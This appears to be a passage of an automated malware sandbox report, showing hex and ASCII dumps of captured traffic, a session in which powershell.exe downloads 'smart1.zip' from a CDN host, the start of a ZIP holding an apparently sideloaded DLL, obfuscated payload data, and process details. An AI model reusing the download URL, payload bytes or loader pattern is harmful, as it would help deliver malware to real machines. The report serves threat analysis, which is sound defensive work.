                                  2024-08-10 17:10:02 UTC16384INData Raw: 00 00 8b f3 89 85 b4 fe ff ff 89 b5 b0 fe ff ff 8d 51 02 66 8b 01 83 c1 02 66 3b c3 75 f5 2b ca d1 f9 83 f9 50 0f 83 f3 00 00 00 57 6a 28 58 89 85 b8 fe ff ff 50 e9 be 00 00 00 8b 85 b8 fe ff ff 57 53 53 ff b5 b4 fe ff ff 89 07 ff 35 08 7d 40 00 ff 35 40 70 40 00 ff 35 48 7c 40 00 ff 15 c8 80 40 00 3d 0e 00 00 80 75 6c 39 9d a8 fe ff ff 0f 84 34 03 00 00 ff b5 b4 fe ff ff 89 9d a8 fe ff ff 53 68 04 00 01 00 ff 35 40 70 40 00 ff 35 48 7c 40 00 ff 15 bc 80 40 00 85 c0 0f 85 08 03 00 00 8b 85 b8 fe ff ff 57 53 53 ff b5 b4 fe ff ff 89 07 ff 35 08 7d 40 00 ff 35 40 70 40 00 ff 35 48 7c 40 00 ff 15 c8 80 40 00 3d 0e 00 00 80 0f 84 d4 02 00 00 85 c0 0f 85 cc 02 00 00 8b 47 04 89 85 b8 fe ff ff 3b 07 76 42 57 ff 15 3c 80 40 00 ff b5 b8 fe ff ff 6a 40 ff 15 58 80
                                  Data Ascii: Qff;u+PWj(XPWSS5}@5@p@5H|@@=ul94Sh5@p@5H|@@WSS5}@5@p@5H|@@=G;vBW<@j@X
                                  2024-08-10 17:10:02 UTC16384INData Raw: 00 73 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 5c 00 44 00 69 00 61 00 6c 00 65 00 72 00 00 00 00 00 50 00 72 00 65 00 66 00 65 00 72 00 72 00 65 00 64 00 20 00 4c 00 69 00 6e 00 65 00 00 00 00 00 50 00 72 00 65 00 66 00 65 00 72 00 72 00 65 00 64 00 20 00 41 00 64 00 64 00 72 00 65 00 73 00 73 00 00 00 4c 00 6f 00 63 00 61 00 6c 00 5c 00 44 00 69 00 61 00 6c 00 65 00 72 00 73 00 49 00 76 00 65 00 42 00 65 00 65 00 6e 00 53 00 74 00 61 00 72 00 74 00 65 00 64 00 4d 00 75 00 74 00 65 00 78 00 00 00 00 00 4e 00 75 00 6d 00 62 00 65 00 72 00 25 00 64 00 00 00 00 00 4e 00 61 00 6d 00 65 00 25 00 64 00 00 00 00 00 4c 00 61 00 73 00 74 00 20 00 64 00 69 00 61 00 6c 00 65 00 64 00 20 00 25 00 64 00 00 00 00 00
                                  Data Ascii: s\CurrentVersion\DialerPreferred LinePreferred AddressLocal\DialersIveBeenStartedMutexNumber%dName%dLast dialed %d
                                  2024-08-10 17:10:02 UTC16384INData Raw: 80 40 00 5f 85 c0 75 03 40 eb 02 33 c0 8b 4d fc 33 cd 5b e8 af 09 00 00 c9 c3 e8 02 0b 00 00 cc cc cc cc cc cc cc 8b ff 55 8b ec 81 ec 58 01 00 00 a1 04 70 40 00 33 c5 89 45 fc 53 33 db 89 95 ac fe ff ff 56 8b c1 c7 85 a8 fe ff ff 01 00 00 00 8b f3 89 85 b4 fe ff ff 89 b5 b0 fe ff ff 8d 51 02 66 8b 01 83 c1 02 66 3b c3 75 f5 2b ca d1 f9 83 f9 50 0f 83 f3 00 00 00 57 6a 28 58 89 85 b8 fe ff ff 50 e9 be 00 00 00 8b 85 b8 fe ff ff 57 53 53 ff b5 b4 fe ff ff 89 07 ff 35 08 7d 40 00 ff 35 40 70 40 00 ff 35 48 7c 40 00 ff 15 c8 80 40 00 3d 0e 00 00 80 75 6c 39 9d a8 fe ff ff 0f 84 34 03 00 00 ff b5 b4 fe ff ff 89 9d a8 fe ff ff 53 68 04 00 01 00 ff 35 40 70 40 00 ff 35 48 7c 40 00 ff 15 bc 80 40 00 85 c0 0f 85 08 03 00 00 8b 85 b8 fe ff ff 57 53 53 ff b5 b4 fe
                                  Data Ascii: @_u@3M3[UXp@3ES3VQff;u+PWj(XPWSS5}@5@p@5H|@@=ul94Sh5@p@5H|@@WSS
                                  2024-08-10 17:10:02 UTC16384INData Raw: 4a 2c 74 4c 2c 4d 62 2c 45 73 2c 41 4a 2c 74 4c 2c 4d 62 2c 6f 43 2c 41 4a 2c 77 6e 2c 79 46 2c 6f 43 2c 41 4a 2c 74 4c 2c 6f 43 2c 6f 43 2c 41 4a 2c 74 4c 2c 4d 62 2c 63 75 2c 41 4a 2c 74 4c 2c 4d 62 2c 71 55 2c 41 4a 2c 74 4c 2c 45 73 2c 74 4c 2c 41 4a 2c 74 4c 2c 4d 62 2c 76 67 2c 41 4a 2c 74 4c 2c 6f 43 2c 79 46 2c 41 4a 2c 74 4c 2c 4d 62 2c 45 73 2c 41 4a 2c 74 4c 2c 4d 62 2c 71 55 2c 41 4a 2c 77 6e 2c 79 46 2c 6f 43 2c 41 4a 2c 77 6e 2c 74 4c 2c 6f 43 2c 41 4a 2c 74 4c 2c 45 73 2c 77 6e 2c 41 4a 2c 77 6e 2c 77 6e 2c 79 46 2c 41 4a 2c 77 6e 2c 74 4c 2c 6f 43 2c 41 4a 2c 74 4c 2c 6f 43 2c 74 4c 2c 41 4a 2c 74 4c 2c 4d 62 2c 71 55 2c 41 4a 2c 74 4c 2c 7a 4a 2c 71 55 2c 41 4a 2c 77 6e 2c 77 6e 2c 79 46 2c 41 4a 2c 77 6e 2c 76 67 2c 71 55 2c 41 4a 2c 77
                                  Data Ascii: J,tL,Mb,Es,AJ,tL,Mb,oC,AJ,wn,yF,oC,AJ,tL,oC,oC,AJ,tL,Mb,cu,AJ,tL,Mb,qU,AJ,tL,Es,tL,AJ,tL,Mb,vg,AJ,tL,oC,yF,AJ,tL,Mb,Es,AJ,tL,Mb,qU,AJ,wn,yF,oC,AJ,wn,tL,oC,AJ,tL,Es,wn,AJ,wn,wn,yF,AJ,wn,tL,oC,AJ,tL,oC,tL,AJ,tL,Mb,qU,AJ,tL,zJ,qU,AJ,wn,wn,yF,AJ,wn,vg,qU,AJ,w
                                  2024-08-10 17:10:02 UTC16384INData Raw: 2c 63 75 2c 71 55 2c 41 4a 2c 77 6e 2c 76 67 2c 74 4c 2c 41 4a 2c 77 6e 2c 63 75 2c 6f 43 2c 41 4a 2c 77 6e 2c 63 75 2c 7a 4a 2c 41 4a 2c 77 6e 2c 63 75 2c 7a 4a 2c 41 4a 2c 77 6e 2c 63 75 2c 71 55 2c 41 4a 2c 77 6e 2c 63 75 2c 63 75 2c 41 4a 2c 77 6e 2c 63 75 2c 79 46 2c 41 4a 2c 77 6e 2c 63 75 2c 6f 43 2c 41 4a 2c 77 6e 2c 63 75 2c 79 46 2c 41 4a 2c 77 6e 2c 63 75 2c 76 67 2c 41 4a 2c 77 6e 2c 77 6e 2c 63 75 2c 41 4a 2c 77 6e 2c 74 4c 2c 71 55 2c 41 4a 2c 77 6e 2c 63 75 2c 6f 43 2c 41 4a 2c 77 6e 2c 77 6e 2c 63 75 2c 41 4a 2c 77 6e 2c 76 67 2c 77 6e 2c 41 4a 2c 77 6e 2c 63 75 2c 7a 4a 2c 41 4a 2c 77 6e 2c 77 6e 2c 76 67 2c 41 4a 2c 77 6e 2c 74 4c 2c 71 55 2c 41 4a 2c 77 6e 2c 63 75 2c 76 67 2c 41 4a 2c 77 6e 2c 63 75 2c 76 67 2c 41 4a 2c 77 6e 2c 77 6e
                                  Data Ascii: ,cu,qU,AJ,wn,vg,tL,AJ,wn,cu,oC,AJ,wn,cu,zJ,AJ,wn,cu,zJ,AJ,wn,cu,qU,AJ,wn,cu,cu,AJ,wn,cu,yF,AJ,wn,cu,oC,AJ,wn,cu,yF,AJ,wn,cu,vg,AJ,wn,wn,cu,AJ,wn,tL,qU,AJ,wn,cu,oC,AJ,wn,wn,cu,AJ,wn,vg,wn,AJ,wn,cu,zJ,AJ,wn,wn,vg,AJ,wn,tL,qU,AJ,wn,cu,vg,AJ,wn,cu,vg,AJ,wn,wn
                                  2024-08-10 17:10:02 UTC16384INData Raw: 79 46 2c 41 4a 2c 74 4c 2c 4d 62 2c 71 55 2c 41 4a 2c 74 4c 2c 6f 43 2c 4d 62 2c 41 4a 2c 77 6e 2c 76 67 2c 71 55 2c 41 4a 2c 77 6e 2c 76 67 2c 77 6e 2c 41 4a 2c 77 6e 2c 76 67 2c 7a 4a 2c 41 4a 2c 77 6e 2c 63 75 2c 45 73 2c 41 4a 2c 77 6e 2c 76 67 2c 45 73 2c 41 4a 2c 77 6e 2c 79 46 2c 6f 43 2c 41 4a 2c 77 6e 2c 79 46 2c 76 67 2c 41 4a 2c 74 4c 2c 6f 43 2c 74 4c 2c 41 4a 2c 74 4c 2c 71 55 2c 7a 4a 2c 41 4a 2c 74 4c 2c 6f 43 2c 74 4c 2c 41 4a 2c 74 4c 2c 4d 62 2c 71 55 2c 41 4a 2c 74 4c 2c 71 55 2c 77 6e 2c 41 4a 2c 74 4c 2c 4d 62 2c 6f 43 2c 41 4a 2c 77 6e 2c 74 4c 2c 74 4c 2c 41 4a 2c 77 6e 2c 77 6e 2c 79 46 2c 41 4a 2c 74 4c 2c 6f 43 2c 6f 43 2c 41 4a 2c 77 6e 2c 76 67 2c 76 67 2c 41 4a 2c 74 4c 2c 71 55 2c 4d 62 2c 41 4a 2c 74 4c 2c 4d 62 2c 63 75 2c
                                  Data Ascii: yF,AJ,tL,Mb,qU,AJ,tL,oC,Mb,AJ,wn,vg,qU,AJ,wn,vg,wn,AJ,wn,vg,zJ,AJ,wn,cu,Es,AJ,wn,vg,Es,AJ,wn,yF,oC,AJ,wn,yF,vg,AJ,tL,oC,tL,AJ,tL,qU,zJ,AJ,tL,oC,tL,AJ,tL,Mb,qU,AJ,tL,qU,wn,AJ,tL,Mb,oC,AJ,wn,tL,tL,AJ,wn,wn,yF,AJ,tL,oC,oC,AJ,wn,vg,vg,AJ,tL,qU,Mb,AJ,tL,Mb,cu,
                                  2024-08-10 17:10:02 UTC16384INData Raw: 50 6a 40 ff 15 58 80 40 00 89 45 f4 85 c0 0f 84 b8 00 00 00 33 ff 39 3d c4 73 40 00 76 62 89 45 f8 8b d0 8b cf e8 92 e9 ff ff 85 c0 75 3e 8b 45 f8 83 c0 14 50 6a 00 68 43 01 00 00 53 ff 15 0c 81 40 00 8b d8 83 fb ff 74 75 83 fb fe 74 70 57 53 68 51 01 00 00 ff 75 fc ff 15 0c 81 40 00 3b 3d 40 70 40 00 75 49 8b f3 8b 5d fc 8b 45 f8 47 05 14 02 00 00 89 45 f8 3b 3d c4 73 40 00 72 a1 33 ff 57 57 68 46 01 00 00 53 ff 15 0c 81 40 00 85 c0 74 2b 8d 46 01 f7 d8 57 1b c0 23 c6 50 68 4e 01 00 00 53 ff 15 0c 81 40 00 33 c0 40 eb 21 83 fe ff 74 b4 3b de 8b 5d fc 77 b0 46 eb ad ff 75 f4 ff 15 3c 80 40 00 33 c0 eb 05 b8 44 00 00 80 5f 5e 5b c9 c3 cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 0c 53 56 57 6a 00 6a 00 8b f1 8b da 68 46 01 00 00 56 89 5d fc 83 cf ff ff 15 0c 81
                                  Data Ascii: Pj@X@E39=s@vbEu>EPjhCS@tutpWShQu@;=@p@uI]EGE;=s@r3WWhFS@t+FW#PhNS@3@!t;]wFu<@3D_^[USVWjjhFV]
                                  2024-08-10 17:10:02 UTC16384INData Raw: 36 bd 36 cf 36 dd 36 e3 36 ee 36 f4 36 fc 36 0b 37 16 37 1e 37 24 37 2a 37 36 37 48 37 4e 37 58 37 65 37 6f 37 7e 37 8c 37 9a 37 a6 37 b6 37 bc 37 dc 37 eb 37 f0 37 fa 37 11 38 17 38 22 38 28 38 4f 38 61 38 67 38 6d 38 7a 38 84 38 93 38 a1 38 cc 38 06 39 19 39 40 39 5c 39 62 39 7b 39 8d 39 a8 39 c5 39 fe 39 17 3a 24 3a 36 3a 3b 3a 63 3a 80 3a 86 3a 8e 3a a9 3a ae 3a ba 3a d3 3a f5 3a 01 3b 07 3b 10 3b 16 3b 27 3b 30 3b 41 3b 4b 3b 51 3b 5c 3b 62 3b 7a 3b 8f 3b 9a 3b a4 3b b3 3b ba 3b d1 3b ed 3b f3 3b fd 3b 0c 3c 31 3c 49 3c 56 3c ce 3c d4 3c e0 3c 18 3e 1e 3e 2f 3e 35 3e 46 3e 4c 3e 5a 3e 63 3e 6a 3e 8c 3e a9 3e c3 3e d2 3e ea 3e 19 3f 2b 3f 33 3f 5b 3f 96 3f b4 3f d1 3f 00 50 00 00 6c 01 00 00 56 30 70 30 ac 30 bf 30 ca 30 fa 30 4e 31 58 31 8b 31 f6 31
                                  Data Ascii: 66666666777$7*767H7N7X7e7o7~777777777788"8(8O8a8g8m8z8888899@9\9b9{99999:$:6:;:c:::::::::;;;;';0;A;K;Q;\;b;z;;;;;;;;;;<1<I<V<<<<>>/>5>F>L>Z>c>j>>>>>>?+?3?[????PlV0p00000N1X111


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.449734185.93.1.2504437336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-08-10 17:10:06 UTC81OUTGET /smart1.zip HTTP/1.1
                                  Host: bidvertiser.b-cdn.net
                                  Connection: Keep-Alive
                                  2024-08-10 17:10:06 UTC628INHTTP/1.1 200 OK
                                  Date: Sat, 10 Aug 2024 17:10:06 GMT
                                  Content-Type: application/zip
                                  Content-Length: 7245419
                                  Connection: close
                                  Server: BunnyCDN-IL1-941
                                  CDN-PullZone: 2426042
                                  CDN-Uid: 4ec946d1-7652-4f1a-8e05-bff5e7098a3d
                                  CDN-RequestCountryCode: US
                                  Cache-Control: public, max-age=2592000
                                  Last-Modified: Sat, 10 Aug 2024 06:15:38 GMT
                                  CDN-StorageServer: NY-268
                                  CDN-FileServer: 749
                                  CDN-ProxyVer: 1.04
                                  CDN-RequestPullSuccess: True
                                  CDN-RequestPullCode: 206
                                  CDN-CachedAt: 08/10/2024 09:36:09
                                  CDN-EdgeStorageId: 894
                                  CDN-Status: 200
                                  CDN-RequestId: b00bf97ff3173da8042ea8752f63991c
                                  CDN-Cache: HIT
                                  Accept-Ranges: bytes
                                  2024-08-10 17:10:06 UTC15528INData Raw: 50 4b 03 04 14 00 00 00 08 00 70 bf 2e 58 c8 b9 a0 29 ac 48 02 00 c0 14 05 00 17 00 00 00 51 74 35 50 72 69 6e 74 53 75 70 70 6f 72 74 56 42 6f 78 2e 64 6c 6c e4 7c 7b 7c 13 65 d6 f0 4c 92 b6 81 52 27 55 c6 ad 2e 2e d1 37 68 51 c4 4a 5d 17 b7 ac 9b 40 0b d3 35 c5 ac 58 40 ae d5 2a e2 2b 42 81 54 f0 4a bb 69 81 ec 10 a8 82 a2 ef a2 e2 1d 77 71 b7 22 42 29 0a 29 29 6d 91 02 e5 5e 40 a0 82 2b a9 55 29 65 2d 05 94 f9 ce 39 cf cc 64 92 16 bc bc df f7 d7 c7 ef 57 32 cf ed dc 9f f3 9c f3 3c cf 4c ce 98 32 ce cc 71 9c 05 fe 14 85 e3 2a 38 f6 cf c9 fd f8 3f 2b cf 71 97 f5 ae bc 8c 5b dd 6d db b5 15 bc 7b db b5 f7 4e 7e 64 a6 bd 60 c6 b4 87 67 dc ff 98 3d ff fe a9 53 a7 79 ed 0f 3c 64 9f 51 38 d5 fe c8 54 7b e6 dd 23 ec 8f 4d 7b f0 a1 fe 49 49 dd 1d 2a 8c 8d bf 9b
                                  Data Ascii: PKp.X)HQt5PrintSupportVBox.dll|{|eLR'U..7hQJ]@5X@*+BTJiwq"B)))m^@+U)e-9dW2<L2q*8?+q[m{N~d`g=Sy<dQ8T{#M{II*
                                  2024-08-10 17:10:06 UTC16384INData Raw: 0d 94 27 70 d2 80 04 98 8f 6b b1 4a 6a c1 f6 c8 4e a5 7d f1 c7 8b 14 6f bc ec aa b6 8c 97 6f a6 59 c7 8b 61 af f1 a0 8e 26 6d 3d 1f a5 a6 85 6e 8f 59 ac dc 3d 95 e6 1c e8 dd ac 26 04 29 0f 5a 85 6b 96 e1 53 8d 35 0b 2d 57 3c d2 d6 4f 04 2b 6d a8 e6 ba 88 9b 56 2f da f7 03 4d 53 e3 f4 69 51 65 78 73 62 f0 61 3f 82 ce 2b 53 0c 74 ca 28 46 4b 6e 60 88 ce ea 29 51 a0 99 81 8c 64 20 63 ec 39 d2 66 46 f0 39 5c fd 7f c7 67 b8 89 cf 77 14 db 24 9f 5e 89 f8 e8 55 f1 f1 59 3c d5 c0 27 4d e0 73 74 80 89 cf 7d 97 80 8f f2 63 08 35 55 19 08 7d 4b 71 5b f2 14 42 68 56 34 42 8a 89 d1 47 53 0c 8c fa 08 8c 0a 22 18 bd 31 35 aa d4 cf c1 e7 fb 4a 03 9f 02 8e cf 5f 55 c4 e7 58 65 2f f8 e4 9b f8 24 08 7c fe cb 65 e2 93 11 07 1f 63 3c 94 d2 78 05 86 86 4a d3 4c 20 83 04 90 79
                                  Data Ascii: 'pkJjN}ooYa&m=nY=&)ZkS5-W<O+mV/MSiQexsba?+St(FKn`)Qd c9fF9\gw$^UY<'Mst}c5U}Kq[BhV4BGS"15J_UXe/$|ec<xJL y
                                  2024-08-10 17:10:06 UTC13984INData Raw: 4f f0 ec 7f d7 92 cd 58 f7 c3 d7 4e b8 67 2b 6b 19 77 df 2a ee 72 0c f1 e1 c1 51 bc 52 37 ce e7 18 0b ce 72 e3 f5 d8 5e c3 16 ef e6 fd 17 5e d6 4d 7c aa fe 7d 52 78 6b b5 4e 2e 72 c9 5e 48 42 2a 4b 42 04 5e ac b7 3f 59 2c bf 0c 0d 56 2d c3 2b 55 de ba e6 e2 a2 a1 c8 8a 8b fa f9 ec 35 55 5a e5 90 97 cc cf 83 c7 16 d8 3c fb 8d fc 32 9c e3 ef f8 32 1e ea 87 cb b1 6a 91 5c a4 05 f3 03 5a 9d 6d 68 b5 3d 5d 7b bf 56 f8 82 2c e5 72 b2 1a ae 59 fd fb 58 3d 2b f9 65 b8 28 20 17 69 97 70 d1 e8 97 fa 46 db 23 b5 00 d6 1d 83 9d 09 6f 9d cd d3 0a ed e1 d2 d2 3c 2d 09 34 4c 7b d5 88 79 31 b8 a4 54 ad ee fa 11 e2 83 d1 aa 75 c4 31 e0 34 94 d2 23 c9 73 e0 6d fb b2 a3 67 f4 bc b4 d0 e2 7b b0 be 7f d4 a0 37 dd b1 20 98 c8 0d 99 d4 1b ab ec 34 f8 fa ad 43 5a 40 6b 88 3b 41
                                  Data Ascii: OXNg+kw*rQR7r^^M|}RxkN.r^HB*KB^?Y,V-+U5UZ<22j\Zmh=]{V,rYX=+e( ipF#o<-4L{y1Tu14#smg{7 4CZ@k;A
                                  2024-08-10 17:10:06 UTC9640INData Raw: a3 cf 06 ce 98 b0 1f 9b 2f 73 51 b6 0d a3 92 07 cf 64 d3 f4 cf 9f 42 6d 9d 9f 52 df 55 06 ca c4 19 3c 95 39 29 47 27 fb 1a 38 c9 e6 4e c6 33 27 1f a0 93 7f 4c 41 52 30 91 db a7 ce 4c 66 83 51 bc cb ef 9c 0a 63 0e 1c 08 19 0f d7 c8 46 c0 b1 cf 11 48 d5 a7 8e 57 ad f7 f2 d4 4e 55 ad 36 fe 35 93 d1 f1 94 03 46 cf 3c ab 67 cb c4 3e ab de 47 01 7d 58 eb f3 73 f8 b5 81 e9 50 90 ce 2b 6a 19 96 63 26 ea de 5c 6f d2 2e cb 76 5a 1f e2 be 99 b6 06 0e 2a 2e 9c 88 9d 5b 65 0b bc 7e 59 7d bb b8 bd b2 f5 f4 26 db 43 b5 6b b5 cc 49 87 28 d8 6c fd c2 29 ef 01 dd ad 91 d8 6e 72 42 30 d8 42 c5 9c 30 1f ae 69 7a 2b 4d 0f e0 07 23 b9 17 31 7a 7b 99 d6 b6 e4 77 80 a8 5e 04 ee 6b 73 6c c8 78 f3 2f c6 4d 84 87 18 dd 94 dc 6d 42 98 67 0a 48 fe 36 f3 99 60 27 08 ab f1 69 a2 06 e0
                                  Data Ascii: /sQdBmRU<9)G'8N3'LAR0LfQcFHWNU65F<g>G}XsP+jc&\o.vZ*.[e~Y}&CkI(l)nrB0B0iz+M#1z{w^kslx/MmBgH6`'i
                                  2024-08-10 17:10:06 UTC8688INData Raw: 52 dd 3f e9 a1 cb 51 d9 cc bd 23 9f 8b 2a 8c 2e 93 cd 13 58 1c 0e 5f 18 74 a0 f6 9b a8 e1 b0 e5 e1 5f ad 5a 7e 65 73 8f 4d bc b8 5a 31 37 17 3e e2 43 03 73 d2 02 f9 fe 51 df 7f 04 09 98 85 9b 66 51 27 03 d6 53 ad 38 06 6b 69 35 ff c4 ac e4 13 10 ce ed c9 72 21 ab c4 2d 1f 61 69 bc f9 51 20 d6 1d 09 d8 30 56 63 90 2d 78 90 8b 98 06 ae a6 1e 55 ad b1 56 b4 7e de e0 e3 9b 68 4a 67 aa ec 60 c3 da be 14 f9 b0 12 25 d4 e3 27 d8 07 3a e5 18 49 3e e9 f0 7e 5b e7 92 f7 3a 6a 85 30 b6 7e 76 df e4 90 ed 11 a9 19 69 61 bf 56 b8 42 0f 4b 19 65 ae bb 0e a7 64 14 f7 95 a3 2d 92 dc cb c2 a6 09 06 11 b5 c9 a6 50 d1 dd 5c dc c2 d0 5b 59 e3 0a 2d 73 25 b0 68 f6 3e 59 65 0d 96 0b 1c b8 5f 24 25 45 dd b9 2e 44 b8 e8 69 25 15 16 5a c6 fd 5a a8 aa 17 3d 21 17 8b a5 c2 bd 96 aa
                                  Data Ascii: R?Q#*.X_t_Z~esMZ17>CsQfQ'S8ki5r!-aiQ 0Vc-xUV~hJg`%':I>~[:j0~viaVBKed-P\[Y-s%h>Ye_$%E.Di%ZZ=!
                                  2024-08-10 17:10:06 UTC16384INData Raw: ff 61 b3 9f aa 61 c1 17 b2 e0 1f 20 f6 fe b0 42 68 fa fd f0 5f fb c3 80 cf 66 af a6 35 bc e3 59 05 59 d2 29 0c 03 a7 18 f8 06 bb c4 68 5f 9d 2c dd d0 76 34 1d 08 7f c7 a1 f0 74 27 10 ed 2b f0 4b e9 d8 a0 e1 6a 60 00 2e 9e 79 87 2e 74 0c 74 92 f3 0d 14 cd f0 ab 31 c1 3f ec b7 f8 ff 86 bd 1c fe e8 4c f1 0f 21 e0 33 07 8b 3f 82 59 fe 6e 16 8c 29 0f fa 2c 18 d3 c7 b3 87 05 e3 07 98 21 0b c6 1c 3b 63 16 8c e9 df 34 61 c1 98 cf b0 8f 05 5b 00 b0 fd 2c 18 53 76 0e fc 89 0f 05 de 37 f2 b0 f8 32 a6 62 ec ee af 9e c6 7f 30 55 2e e1 be 62 37 cf 37 b2 e0 ac fc 6b 01 d5 47 3b a1 60 01 00 87 30 23 da a0 bb 38 d1 c4 11 87 63 8d 66 99 99 3f 04 62 e3 0f e1 65 79 9e 4d 2c ef 92 1a f2 33 f4 af 3a 58 2f f7 03 ba 0b 50 c3 eb 88 59 c5 29 db 03 2a 0f a8 15 a0 3f 2e 50 bf 0d 89
                                  Data Ascii: aa Bh_f5YY)h_,v4t'+Kj`.y.tt1?L!3?Yn),!;c4a[,Sv72b0U.b77kG;`0#8cf?beyM,3:X/PY)*?.P
                                  2024-08-10 17:10:06 UTC16384INData Raw: ba 37 90 0b fb 81 37 d4 31 2c 97 95 e6 5a 0b 4e e1 f6 e0 a9 3c 7e 71 e6 b1 74 23 27 a5 09 05 6c a2 49 70 3f 33 17 d1 0a cc e6 98 3f f2 6b c7 81 70 d5 87 67 12 53 ed 3e 78 4f c1 93 0f e9 88 c1 0a 61 b8 5a 6f 60 2e 1c b5 c7 92 ef 0a 4f b8 85 17 87 f7 b9 d5 84 e4 18 44 fe 50 ad a1 b4 88 b8 14 6c a2 9a f4 e0 6a c2 15 9d 69 9c a2 90 06 5c 9a ea 75 d3 9f 2f aa 54 62 69 75 af f7 d7 5e 8a 2a 3c 5e 1b 54 b5 c8 d8 68 7a 4f b1 ea 80 a8 86 45 91 e8 15 28 7e b8 a0 b5 14 9f 77 43 33 dc b9 9a 3c c6 2c 93 09 7a 3b 77 81 aa b1 94 ff bc ae cb 7b 32 b6 8d d0 de 38 f5 73 e2 32 4b 82 0c bf 06 28 05 0b 53 48 7f 10 e4 09 a4 7e 6d 89 a8 3c 5b 08 9d c9 58 74 9e e0 57 0c 3b dd 9c bb 0e d5 0f 09 06 49 37 47 3c ef 3d 76 4c 87 5d 35 b6 33 d5 b4 93 48 28 81 96 9f 8a ab ce ac 3d 47 99
                                  Data Ascii: 771,ZN<~qt#'lIp?3?kpgS>xOaZo`.ODPlji\u/Tbiu^*<^ThzOE(~wC3<,z;w{28s2K(SH~m<[XtW;I7G<=vL]53H(=G
                                  2024-08-10 17:10:06 UTC16384INData Raw: c0 8e 66 84 bb e3 42 8d d3 70 28 79 1a 0e ed f5 a0 72 86 b1 f3 67 e0 10 ef 0c 16 8e 25 6b 5b f6 e6 d6 27 5d 94 1f 68 dc 25 bb c8 1d e5 3d fe c9 a7 32 f3 77 1d 50 32 4d b0 f2 76 d7 8d dd 9e 6e 20 3b 06 e4 3b cd fc 7b 7b 8a b0 f2 1b 41 7a e9 2f fc dd 7b b4 27 66 17 2f c2 e3 ef ed 61 9f dd bb 3d 62 58 79 4b ff d2 1e 01 20 db 06 f0 2a ce fe 7b 7b 7c b1 f2 63 40 ba 06 0b c7 96 f5 b7 f6 d8 ec e2 d5 d9 a3 3d 53 ff d2 1e c4 dc 9f bc dd 75 07 ef 21 4f 7a 6e 6f 79 9a 58 79 f4 73 7b db 27 0b c8 0e 06 f9 26 73 7b db 07 55 7b 32 56 7e 23 48 2f 01 d0 9c 87 ff 43 36 b4 4b 36 ce 5f f4 0e de 55 a6 11 f0 c1 ff d6 ff f3 7f 97 8d 92 29 86 95 f7 3f e9 b2 b4 47 bf b9 ed 21 1f 45 0d c7 ca db 4b 36 b6 1d e9 ef e3 42 6d 80 2f 6b 7e 6f 7b a0 7d 0b 76 fe 02 56 7a 4b 06 f4 17 3d db
                                  Data Ascii: fBp(yrg%k[']h%=2wP2Mvn ;;{{Az/{'f/a=bXyK *{{|c@=Su!OznoyXys{'&s{U{2V~#H/C6K6_U)?G!EK6Bm/k~o{}vVzK=
                                  2024-08-10 17:10:07 UTC16384INData Raw: b7 50 cb 22 09 b3 af 81 c6 77 f5 12 af 0a 35 2e 5d 1c 53 93 5a 15 eb 68 6f c9 32 87 32 5c 85 5e 2e 76 6e 8f 9d 9b 6f f7 56 f9 19 d7 56 39 b3 74 ae 6d f3 76 c7 d2 94 38 ef b5 a3 c8 b1 34 d3 63 50 15 5c cc 96 5a 36 0b 4f eb 4d b2 b3 a9 ab 61 8e e7 76 5d 05 c7 48 bd 7d 43 e5 a9 8e 85 16 67 89 4e 0d 96 98 11 83 54 cc 54 d5 47 32 b9 21 6a 4d 78 87 c9 fe e2 ad 74 9b f3 2c a5 67 da b5 94 54 dc 2b 0f 07 e2 a9 1e a8 19 81 d2 dc 6c 5d 54 93 35 f2 46 7a 2b 59 d7 b7 c8 8f f4 be 20 4b 90 47 9f 58 99 bb 3f 56 ed 35 67 ac 5a 1f 86 aa 35 3f d4 e6 5d 09 33 54 b2 9f 16 04 1a 4d 55 a7 4f 85 7d 6a aa ca a3 e1 97 dd 19 30 c3 ed 1d 31 33 b5 d3 f6 9b 78 56 4e bd c1 ff f4 4e fb 67 6d 72 44 24 37 f3 ed d1 e4 7f 67 ab ae c4 d2 4a a4 81 7e c2 b6 c1 a7 96 1d 6f 3e 71 4d 78 45 6a 04
                                  Data Ascii: P"w5.]SZho22\^.vnoVV9tmv84cP\Z6OMav]H}CgNTTG2!jMxt,gT+l]T5Fz+Y KGX?V5gZ5?]3TMUO}j013xVNNgmrD$7gJ~o>qMxEj
                                  2024-08-10 17:10:07 UTC16384INData Raw: ad 7c d0 b6 0a d0 ef e0 dc 01 80 09 95 c4 3e 4f 03 78 bf 92 28 ab 53 00 5d aa 80 6e 82 63 7c 01 4e 55 6d fa 82 6a 20 17 d7 c1 36 28 af 04 f8 0a 10 3b d2 06 80 0c 35 40 26 15 d0 04 d4 01 44 a9 80 26 60 0c 20 8c 02 9a 80 99 9b 3c 82 3b 6a 89 3c 82 bb 00 c9 29 a0 09 f8 76 b3 9c 80 37 88 3c 82 a6 9b 3c 82 a7 37 79 04 c7 ea 88 3c 82 7a f5 44 1e 41 87 4d 1e c1 85 4d 1e 41 96 06 22 8f e0 6a 23 f0 6b 0a 68 02 da 35 11 db 80 a0 69 f3 66 bf 01 0c 68 26 da 52 04 af 02 8a 52 40 13 f0 06 a0 74 c0 b7 02 fc da 0e f4 1a f4 03 d4 01 ec 67 c7 a6 fd 04 f8 01 50 3d 52 de 09 64 be 0b e8 02 e0 5b 01 8a 76 13 c7 08 06 a8 df 03 fc 32 a8 c7 18 60 78 0f d1 cf ea 0e 83 f1 19 26 8e 57 3a c0 5b 9b 7c 07 40 d4 08 f1 18 52 80 72 9b 3c 82 fb 36 79 63 80 21 9b 3c 82 29 9b 7c 1a c0 a5 11
                                  Data Ascii: |>Ox(S]nc|NUmj 6(;5@&D&` <;j<)v7<<7y<zDAMMA"j#kh5ifh&RR@tgP=Rd[v2`x&W:[|@Rr<6yc!<)|


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:13:09:57
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
